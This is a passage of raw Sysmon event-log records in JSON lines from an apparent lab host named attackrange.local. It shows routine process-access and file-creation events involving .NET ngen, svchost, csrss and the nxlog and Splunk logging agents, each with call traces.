C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13C9-5F25-0000-001028DC1100}\r\nTargetProcessId: 4140\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:37.810","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13C9-5F25-0000-001028DC1100}","TargetProcessId":"4140","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9150,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:38.029\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 4104\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13A1-5F25-0000-001005A71000}\r\nTargetProcessId: 2968\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:38.029","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"4104","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13A1-5F25-0000-001005A71000}","TargetProcessId":"2968","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9151,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:38.029\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13A1-5F25-0000-001005A71000}\r\nTargetProcessId: 2968\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:38.029","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13A1-5F25-0000-001005A71000}","TargetProcessId":"2968","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9152,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:38.044\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13CA-5F25-0000-001013E01100}\r\nTargetProcessId: 2968\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:38.044","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13CA-5F25-0000-001013E01100}","TargetProcessId":"2968","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9153,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:38.044\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:38.044","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9154,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:39.044\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:39.044","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":9155,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:03:39.904\r\nProcessGuid: {E2A3D6B1-13CA-5F25-0000-001013E01100}\r\nProcessId: 2968\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\b98-0\\WindowsBase.dll\r\nCreationUtcTime: 2020-08-01 07:03:39.904","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:03:39.904","ProcessGuid":"{E2A3D6B1-13CA-5F25-0000-001013E01100}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\b98-0\\WindowsBase.dll","CreationUtcTime":"2020-08-01 07:03:39.904","EventReceivedTime":"2020-08-01 07:03:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9156,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:40.013\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 876\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13CC-5F25-0000-00101AE51100}\r\nTargetProcessId: 3288\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:40.013","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"876","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13CC-5F25-0000-00101AE51100}","TargetProcessId":"3288","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.